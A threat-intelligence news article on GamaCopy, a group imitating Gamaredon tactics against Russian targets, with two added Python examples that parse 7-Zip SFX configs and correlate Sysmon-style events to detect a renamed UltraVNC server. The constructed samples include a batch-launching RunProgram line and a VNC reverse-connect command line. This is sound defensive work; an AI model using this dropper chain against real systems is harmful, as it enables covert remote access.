GamaCopy Mimics Gamaredon Tactics in Cyber Espionage Targeting Russian Entities

By Ravie Lakshmanan (The Hacker News), January 27, 2025 | Cyber Espionage / Threat Intelligence

A previously unknown threat actor has been observed copying the tradecraft associated with the Kremlin-aligned Gamaredon hacking group in its cyber attacks targeting Russian-speaking entities.

The campaign has been attributed to a threat cluster dubbed GamaCopy, which is assessed to share overlaps with another hacking group named Core Werewolf, also tracked as Awaken Likho and PseudoGamaredon.

According to the Knownsec 404 Advanced Threat Intelligence team, the attacks leverage content related to military facilities as lures to drop UltraVNC, allowing threat actors to remotely access the compromised hosts.

“The TTP (Tactics, Techniques, and Procedures) of this organization imitates that of the Gamaredon organization which conducts attacks against Ukraine,” the company said in a report published last week.

The disclosure arrives nearly four months after Kaspersky revealed that Russian government agencies and industrial entities have been the target of Core Werewolf, with the spear-phishing attacks paving the way for the MeshCentral platform instead of UltraVNC.

The starting point of the attack chain mirrors the one detailed by the Russian cybersecurity company wherein a self-extracting (SFX) archive file created using 7-Zip acts as a conduit to drop next-stage payloads. This includes a batch script that’s responsible for delivering UltraVNC, while also displaying a decoy PDF document.
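The SFX stage described above can be triaged statically before anything is detonated. The Python below is an added example written for this page, not code from Knownsec 404, Kaspersky or The Hacker News. It relies on two documented 7-Zip facts: a .7z archive begins with the six-byte signature 37 7A BC AF 27 1C, and 7-Zip's installer-style SFX modules read an optional text configuration, delimited by ;!@Install@!UTF-8! and ;!@InstallEnd@!, whose RunProgram or ExecuteFile key names what to launch after extraction. The sample bytes, the lure title, the install.bat name and the OneDrivers.exe indicator are constructed for the demonstration and are not taken from the campaign samples.

```python
import re

# Documented 7-Zip constants.
SEVENZ_SIG = b"\x37\x7a\xbc\xaf\x27\x1c"   # '7z\xBC\xAF\x27\x1C': start of a .7z archive
CFG_START = b";!@Install@!UTF-8!"          # installer-SFX config block delimiters
CFG_END = b";!@InstallEnd@!"

# Indicators drawn from the campaign description: the SFX hands off to a batch
# script, and the VNC server is renamed to look like a OneDrive binary.
BATCH_RE = re.compile(r'\.(?:bat|cmd)(?:"|\s|$)', re.I)
LOOKALIKE_NAMES = ("onedrivers.exe",)      # constructed indicator list
CFG_LINE_RE = re.compile(r'^\s*(\w+)\s*=\s*"?(.*?)"?\s*$', re.M)


def parse_sfx(data: bytes) -> dict:
    """Locate the embedded 7z archive and any SFX config block inside a PE stub."""
    if data[:2] != b"MZ":
        raise ValueError("not a PE file, so not a 7-Zip SFX")
    archive_off = data.find(SEVENZ_SIG)
    if archive_off < 0:
        raise ValueError("no 7z signature found: not a 7-Zip SFX")
    info = {"archive_offset": archive_off, "has_config": False, "config": {}}
    start = data.find(CFG_START)
    # The config block, when present, sits between the stub and the archive.
    if 0 <= start < archive_off:
        end = data.find(CFG_END, start)
        if end < 0 or end > archive_off:
            raise ValueError("SFX config block is not terminated before the archive")
        block = data[start + len(CFG_START):end].decode("utf-8", "replace")
        info["has_config"] = True
        for key, value in CFG_LINE_RE.findall(block):   # lines look like Key="value"
            info["config"].setdefault(key, []).append(value)
    return info


def is_sfx(data: bytes) -> bool:
    """True when the bytes parse as a 7-Zip SFX (PE stub plus embedded archive)."""
    try:
        parse_sfx(data)
        return True
    except ValueError:
        return False


def triage(data: bytes) -> list:
    """Human-readable findings for an SFX; an empty list means nothing was flagged."""
    info = parse_sfx(data)
    findings = []
    # RunProgram (CreateProcess) and ExecuteFile (ShellExecute) both run something
    # after extraction; a batch script or a look-alike name is what we care about.
    for key in ("RunProgram", "ExecuteFile"):
        for cmd in info["config"].get(key, []):
            if BATCH_RE.search(cmd):
                findings.append(f"{key} launches a batch script: {cmd}")
            if any(n in cmd.lower() for n in LOOKALIKE_NAMES):
                findings.append(f"{key} references a OneDrive look-alike name: {cmd}")
    return findings


# Constructed sample: a fake PE stub, a config block in the style a batch-script
# hand-off needs, then the first bytes of a 7z archive. Not a real sample.
SAMPLE_SFX = (
    b"MZ" + b"\x00" * 126
    + b";!@Install@!UTF-8!\r\n"
    b'Title="Military facility documents"\r\n'      # lure text (constructed)
    b'RunProgram="cmd /c install.bat"\r\n'          # hand-off to the batch dropper
    b";!@InstallEnd@!\r\n"
    + SEVENZ_SIG + b"\x00\x04" + b"\x00" * 32       # archive header start (constructed)
)

# Constructed benign-looking SFX: extraction only, no config block.
BENIGN_SFX = b"MZ" + b"\x00" * 126 + SEVENZ_SIG + b"\x00\x04" + b"\x00" * 32


if __name__ == "__main__":
    for label, blob in (("sample", SAMPLE_SFX), ("benign", BENIGN_SFX)):
        print(label, parse_sfx(blob)["config"], triage(blob))
```

The config block is what tells you whether the victim gets a plain extraction or a hand-off to a script; the archive body is compressed, so the file names inside it need `7z l` on the file rather than a byte scan.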

The UltraVNC executable is given the name “OneDrivers.exe” in a likely effort to evade detection by passing it off as a binary associated with Microsoft OneDrive.

Knownsec 404 said the activity shares several similarities with Core Werewolf campaigns, including the use of 7z-SFX files to install and execute UltraVNC, the use of port 443 for the connection to the server, and the use of EnableDelayedExpansion (a setlocal option that makes batch-file variables expand at run time rather than when a line is parsed) in the batch script.
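Those overlaps (SFX extraction, a batch script as the launcher, a renamed VNC server talking out on 443) also map onto endpoint telemetry. The script below is an added detection example, not a rule published by Knownsec 404, Kaspersky or The Hacker News: it correlates constructed Sysmon-style process-creation (event 1) and network-connection (event 3) records and scores each process on how many of those traits it shows, so the real OneDrive client, which also talks on 443, is not flagged. The OneDrive install directories, the 7ZipSfx.NNN temporary directory that 7-Zip's SFX stub extracts into, the winvnc.exe OriginalFileName of the UltraVNC server and the command-line flags are assumptions to confirm in your own environment.

```python
import ntpath
import re

# Where the genuine OneDrive.exe lives (per-user and per-machine installs). Assumed.
LEGIT_ONEDRIVE_DIRS = (r"\appdata\local\microsoft\onedrive", r"\program files\microsoft onedrive")
BATCH_RE = re.compile(r"\.(?:bat|cmd)\b", re.I)

# Constructed Sysmon-like events, not telemetry from the campaign.
EVENTS = [
    # explorer starts the real OneDrive client, which also uses 443: must not alert
    {"id": 1, "pid": 3000, "ppid": 1200,
     "image": r"C:\Users\u\AppData\Local\Microsoft\OneDrive\OneDrive.exe",
     "original_filename": "OneDrive.exe", "cmdline": "OneDrive.exe /background"},
    {"id": 3, "pid": 3000, "dst_ip": "203.0.113.5", "dst_port": 443},
    # the SFX stub runs the batch dropper, which starts the renamed VNC server
    {"id": 1, "pid": 4100, "ppid": 4000,
     "image": r"C:\Windows\System32\cmd.exe", "original_filename": "Cmd.Exe",
     "cmdline": r'cmd /c "C:\Users\u\AppData\Local\Temp\7ZipSfx.000\install.bat"'},
    {"id": 1, "pid": 4104, "ppid": 4100,
     "image": r"C:\Users\u\AppData\Local\Temp\7ZipSfx.000\OneDrivers.exe",
     "original_filename": "winvnc.exe",          # UltraVNC server's PE name (assumed)
     "cmdline": "OneDrivers.exe -autoreconnect -connect 203.0.113.10:443"},  # constructed
    {"id": 3, "pid": 4104, "dst_ip": "203.0.113.10", "dst_port": 443},
]


def reasons_for(proc: dict, procs: dict) -> list:
    """Static traits of one process-creation record that match the campaign pattern."""
    path = proc["image"].lower()
    name = ntpath.basename(path)
    reasons = []
    legit = name == "onedrive.exe" and ntpath.dirname(path).endswith(LEGIT_ONEDRIVE_DIRS)
    if "onedrive" in name and not legit:
        reasons.append("OneDrive look-alike name outside the OneDrive install directories")
    orig = proc.get("original_filename", "").lower()
    if orig and orig != name:
        reasons.append(f"on-disk name differs from PE OriginalFileName {orig!r} (renamed binary)")
    if "\\7zipsfx." in path:
        reasons.append("runs from a 7-Zip SFX extraction directory")
    parent = procs.get(proc["ppid"])
    if parent and ntpath.basename(parent["image"].lower()) == "cmd.exe" \
            and BATCH_RE.search(parent.get("cmdline", "")):
        reasons.append("spawned by a batch script via cmd.exe")
    return reasons


def detect(events: list, min_reasons: int = 2) -> list:
    """Correlate process and network events; alert on processes with enough traits."""
    procs = {e["pid"]: e for e in events if e["id"] == 1}
    conns = {}
    for e in events:
        if e["id"] == 3:
            conns.setdefault(e["pid"], []).append(e)
    alerts = []
    for pid, proc in procs.items():
        reasons = reasons_for(proc, procs)
        to_443 = [c for c in conns.get(pid, []) if c["dst_port"] == 443]
        # 443 on its own is meaningless; it only strengthens an existing suspicion.
        if to_443 and reasons:
            reasons.append(f"outbound connection to {to_443[0]['dst_ip']}:443")
        if len(reasons) >= min_reasons:
            alerts.append({"pid": pid, "image": proc["image"], "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for alert in detect(EVENTS):
        print(alert["pid"], alert["image"])
        for r in alert["reasons"]:
            print("  -", r)
```

Scoring on several weak traits rather than on any single one is deliberate: a renamed binary, a batch-script parent or a temp-directory image each occur in benign installers, but a process showing all of them and then opening 443 outbound is the chain the report describes.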

“Since its exposure, this organization has frequently mimicked the TTPs used by the Gamaredon organization and cleverly used open-source tools as a shield to achieve its own goals while confusing the public,” the company said.

GamaCopy is one of the many threat actors that have targeted Russian organizations in the wake of the Russo-Ukrainian war, such as Sticky Werewolf (aka PhaseShifters), Venture Wolf, and Paper Werewolf.

“Groups like PhaseShifters, PseudoGamaredon, and Fluffy Wolf stand out for their relentless phishing campaigns aimed at data theft,” Positive Technologies’ Irina Zinovkina said.
